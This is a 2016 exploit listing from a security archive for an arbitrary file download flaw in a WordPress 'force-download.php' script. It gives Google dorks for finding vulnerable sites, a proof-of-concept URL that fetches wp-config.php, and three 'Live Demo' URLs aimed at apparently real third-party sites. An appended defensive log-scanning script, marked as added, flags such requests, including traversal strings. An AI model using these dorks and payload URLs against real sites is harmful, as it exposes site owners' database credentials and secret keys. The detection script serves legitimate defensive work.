Wordpress force download Arbitrary File Download

2016.08.08
xBADGIRL21 (MR)
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

######################
# Exploit Title : Wordpress force download Arbitrary File Download
# Dork 1 : inurl:force-download.php?file=wp-content/uploads
# Dork 2 : inurl:wp-content/uploads inurl:force-download.php?file=
# Vendor Homepage : http://elouai.com/force-download.php
# Tested on: [ BACKBOX]
# skype:xbadgirl21
# Date: 07/08/2016
# video Proof : https://www.youtube.com/watch?v=V3o_17be8zY
######################
# PoC
######################
# [+] Using the `force-download.php` file from WordPress websites we can download any file.
#
# [!] http://localhost/force-download.php?file=wp-config.php
#
######################
# Live Demo
######################
# [!] https://www.quantumib.com/force-download.php?file=wp-config.php
# [!] https://help.jin-soku.biz/force-download.php?file=wp-config.php
# [!] http://www.globalvoip.ca/force-download.php?file=wp-config.php
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################
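For site owners checking whether this script has been abused, the following is an added example (not part of the original advisory) that scans web access logs for `force-download.php` requests whose `file` parameter leaves the uploads directory. It goes slightly beyond the advisory's single `file=wp-config.php` case by also normalizing encoded and relative paths; the `wp-content/uploads/` allow-list, the combined log format and the sample lines are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: legitimate downloads live under the uploads tree (as in the dorks).
ALLOWED_PREFIX = "wp-content/uploads/"
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(file_param):
    """Return None if the path stays inside ALLOWED_PREFIX, else a reason string."""
    value = file_param
    for _ in range(3):  # peel nested URL-encoding before judging the path
        value = unquote(value)
    value = value.replace("\\", "/")
    if value.startswith("/") or re.match(r"[A-Za-z][A-Za-z0-9+.-]*:", value):
        return "absolute path or stream wrapper"
    if ".." in value.split("/"):
        return "path traversal"
    if not posixpath.normpath(value).startswith(ALLOWED_PREFIX):
        return "outside uploads directory"
    return None

def scan(lines, script="force-download.php"):
    """Return (client, file, status, reason) for each suspicious request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if posixpath.basename(url.path) != script:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("file", []):
            reason = classify(value)
            if reason:
                findings.append((client, value, int(status), reason))
    return findings

# Constructed sample lines (documentation IP ranges), combined log format.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Aug/2016:10:00:01 +0000] "GET /force-download.php?file=wp-content/uploads/2016/08/report.pdf HTTP/1.1" 200 48213',
    '198.51.100.7 - - [08/Aug/2016:10:02:13 +0000] "GET /force-download.php?file=wp-config.php HTTP/1.1" 200 3120',
    '198.51.100.7 - - [08/Aug/2016:10:02:20 +0000] "GET /force-download.php?file=wp-content/uploads/../../wp-config.php HTTP/1.1" 200 3120',
    '203.0.113.5 - - [08/Aug/2016:10:05:44 +0000] "GET /index.php?file=wp-config.php HTTP/1.1" 404 150',
]

for finding in scan(SAMPLE_LOG):
    print(finding)
```

A finding with status 200 means the file was most likely served; if that file was `wp-config.php`, rotate the database credentials and the authentication keys and salts it contains.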



Copyright 2024, cxsecurity.com

 
